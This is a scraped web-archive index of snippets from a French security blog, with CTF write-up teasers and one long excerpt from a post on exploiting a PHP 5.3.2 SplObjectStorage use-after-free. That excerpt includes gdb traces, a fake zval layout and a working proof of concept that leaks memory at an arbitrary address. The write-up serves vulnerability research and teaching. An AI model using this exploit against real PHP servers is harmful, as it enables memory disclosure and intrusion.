archive-fr.com » FR » A » AEROXTEAM.FR

Total: 49

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • Gu1's Website - Posts taggés « csaw »
    web writeup It s fall again and like every year many CTF are happening in those few months Earlier this week I participated in the hack lu CTF A CTF organized by the FluxFingers team as a part of the hack lu conference in luxembourg It was a pretty cool CTF with interesting challenges to solve I m not going to do any writeup since there was really nothing interesting

    Original URL path: http://gu1.aeroxteam.fr/tags/csaw/ (2015-12-30)
    Open archived version from archive


  • Gu1's Website - Posts taggés « hack.lu »
    web writeup It s fall again and like every year many CTF are happening in those few months Earlier this week I participated in the hack lu CTF A CTF organized by the FluxFingers team as a part of the hack lu conference in luxembourg It was a pretty cool CTF with interesting challenges to solve I m not going to do any writeup since there was really nothing interesting

    Original URL path: http://gu1.aeroxteam.fr/tags/hack.lu/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « web »
    writeup since there was really nothing interesting to say about the challenges I worked on You can always find writeups on the web if you re interested There are a few on shell storm org I also participated in the 0 Commentaires Lire la suite PlaidCTF 2011 web 300 Django really Par Gu1 le 29 04 2011 à 15 01 tags memcached pctf plaidctf web writeup Hello This writeup will

    Original URL path: http://gu1.aeroxteam.fr/tags/web/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « writeup »
    we solved during PlaidCTF 2011 We had access to a simple guestbook with a form We tried to trigger a bug unsuccessfully At first we thought the vulnerability might be a flaw in csrf handling because of the advisory published last february The app was reacting strangely to the csrf cookie re setting it multiple times but then the organizers removed the csrf check altogether We were stuck at this point until a hint was given django settings file contained a reference to a memcached server We hadn t tried to 0 Commentaires Lire la suite Hackito Ergo Sum 2011 Par Gu1 le 12 04 2011 à 22 16 tags conference writeup Salut J étais au Hackito Ergo Sum 2011 le week end dernier Je n avais pas eu l opportunité d écrire d article sur la précédente édition de cette conférence car mon blog était plus ou moins mort fermé donc je vais me rattraper en vous parlant du contenu de cette année Le niveau des talks était très bon et l ambiance plus cosmopolite que certaines autres confs françaises Le programme est disponible par là Tous les talks avaient l air intéressants même si j en ai manqué certains notamment celui sur le DWARF après être parti me mesurer au 0 Commentaires Lire la suite Padocon 2011 Karma 200 using ROP Par Gu1 le 28 01 2011 à 01 17 tags buffer overflow ctf english padocon return oriented programming writeup Yet another writeup for the Padocon 2011 This time i m gonna talk about karma200 a level that we did not validate during the CTF but i was curious to see how i could exploit it so i worked on it with Mysterie kutio teach and others these last few days Like for karma100 we had ssh credentials

    Original URL path: http://gu1.aeroxteam.fr/tags/writeup/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Pwning PHP for fun and chocapicz (repost)
    spl spl observer c 141 141 pelement spl object storage get intern obj TSRMLS CC gdb printzv obj 0x086fedb4 refcount 2 object stdClass 2 0 gdb printzv inf 0x086ffef4 refcount 1 string 4 BBBB gdb c Continuing object SplObjectStorage 1 1 storage SplObjectStorage private array 1 000000006becfaa4000000006c7e449f array 2 obj object stdClass 2 0 inf string 4 BBBB Program exited normally o it works Still in gdb we are going to check the number of reference to AAAA after the second call to spl object storage attach gdb r a Starting program home gu1 php 5 3 2 sapi cli php a Thread debugging using libthread db enabled Interactive mode enabled php var dump unserialize C 16 SplObjectStorage 63 x i 2 O 8 stdClass 0 s 4 AAAA r 1 s 4 BBBB m a 0 Breakpoint 1 spl object storage attach intern 0x86fec68 obj 0x86fedb4 inf 0x86ffea4 at home gu1 php 5 3 2 ext spl spl observer c 141 141 pelement spl object storage get intern obj TSRMLS CC gdb c Continuing Breakpoint 1 spl object storage attach intern 0x86fec68 obj 0x86fedb4 inf 0x86ffef4 at home gu1 php 5 3 2 ext spl spl observer c 141 141 pelement spl object storage get intern obj TSRMLS CC gdb b spl observer c 148 Breakpoint 3 at 0x81c4cb2 file home gu1 php 5 3 2 ext spl spl observer c line 148 gdb c Continuing Breakpoint 3 spl object storage attach intern 0x86fec68 obj 0x86fedb4 inf 0x86ffef4 at home gu1 php 5 3 2 ext spl spl observer c 148 148 zval ptr dtor pelement inf gdb printzv pelement inf 0x086ffea4 refcount 1 string 4 AAAA gdb next 149 pelement inf inf gdb printzv pelement inf 0x086ffea4 refcount 0 string 4 Cannot access memory at address 0x0 gdb next 166 gdb next zim spl SplObjectStorage unserialize ht 1 return value 0x86fed98 return value ptr 0xbfffbb5c this ptr 0x86fdbc8 return value used 1 at home gu1 php 5 3 2 ext spl spl observer c 653 653 zval ptr dtor pentry gdb ptype var hash type struct php unserialize data void first void first dtor gdb print var entries var hash first 1 data 0x86fedb4 0x86ffea4 0x86ffef4 0x86ffef4 0x0 repeats 1020 times used slots 4 next 0x0 pelement inf s reference counter is at 1 and it is decremented using zval ptr dtor line 24 which means the zval struct and the string it was pointing to AAAA are freed But we can see back in SplObjectStorage unserialize that var hash the array containing pointers to all variables previously parsed by php var unserialize still contains a pointer to the old pelement inf that was just freed It means we can get a reference to invalid memory using references in our serialized string What can we do with this you ask If we control memory allocation to some extent it should be possible to allocate a fake zval struct at AAAA s zval struct old address This would theoretically allow us to read or write anywhere in memory I should probably talk a bit more about the zval struct before showing you the POC zval is an essential struct in the PHP interpreter It is used to represent a php variable struct zval struct Variable information zvalue value value value of the variable zend uint refcount gc number of references zend uchar type variable type null long double bool array object string ressource zend uchar is ref gc boolean is this a reference typedef union zvalue value long lval double dval struct char val int len str HashTable ht zend object value obj zvalue value We are going to have to craft a fake zval struct to achieve our evil goal pwning php Finaly here is a working POC who leak memory at an arbitrary address php The text in braces is 73 characters long and define a SplObjectStorage C 16 SplObjectStorage 73 The SplObjectStorage has 3 entry x i 3 obj stdClass inf AAAA O 8 stdClass 0 s 4 AAAA obj ref to stdClass inf BBBB r 1 s 4 BBBB obj ref to BBBB inf ref to AAAA Note at this point the ref to AAAA is already invalid since it was freed when the previous entry was processed Note 2 we have to use R instead of r r should be used for multiple variables refering to the same instance of a class and R for real references with zval is ref gc set to true r 3 R 2 property of the object that could have been set manually m a 0 fakezval pack IIII unsigned integer machine dependent size and byte order 0 x08048000 this is where the string begin the address to leak 0 x0000000f the length of the string 0 x00000000 refcount 0 x00000006 data type NULL 0 LONG 1 DOUBLE 2 BOOL 3 ARR 4 OBJ 5 STR 6 RESS 7 objst unserialize C 16 SplObjectStorage 73 x i 3 O 8 stdClass 0 s 4 AAAA r 1 s 4 BBBB r 3 R 2 m a 0 objst rewind objst next we move the internal pointer to the second element in the SplObjectStorage for i 0 i 5 i v i fakezval i we repeat the same value several times to overwrite the zval that was freed if you are on linux this should print 16 characters at the adress 0x08048000 which is generally the beginning of the executable in memory echo objst getInfo This POC should work out of the box with PHP 5 3 2 cli cgi mod php with or without the Suhosin Patch applied Some modifications may be required to make it work with PHP 5 3 2 Here is the output of the script on my computer gu1 0wZd4W0rld php 5 3 2 sapi cli php ownz php hexdump C 00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 ELF 0000000f We leaked the begining of

    Original URL path: http://gu1.aeroxteam.fr/2011/06/15/pwning-php-fun-and-chocapicz-repost/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « MOPS-2010-061 »
    repost microblog nibbles use after free june 2011 This is an article I originally posted on the nibbles microblog on july 3rd 2010 but the blog went down permanently a few days ago so i decided to re post it here Thanks again to everyone who contributed to this article real myst and others Hello everyone Today i m going to talk about the latest PHP vulnerability discovered by Stefan

    Original URL path: http://gu1.aeroxteam.fr/tags/MOPS-2010-061/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « php »
    microblog nibbles use after free june 2011 This is an article I originally posted on the nibbles microblog on july 3rd 2010 but the blog went down permanently a few days ago so i decided to re post it here Thanks again to everyone who contributed to this article real myst and others Hello everyone Today i m going to talk about the latest PHP vulnerability discovered by Stefan Esser

    Original URL path: http://gu1.aeroxteam.fr/tags/php/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « repost microblog nibbles »
    repost microblog nibbles use after free june 2011 This is an article I originally posted on the nibbles microblog on july 3rd 2010 but the blog went down permanently a few days ago so i decided to re post it here Thanks again to everyone who contributed to this article real myst and others Hello everyone Today i m going to talk about the latest PHP vulnerability discovered by Stefan

    Original URL path: http://gu1.aeroxteam.fr/tags/repost%20microblog%20nibbles/ (2015-12-30)
    Open archived version from archive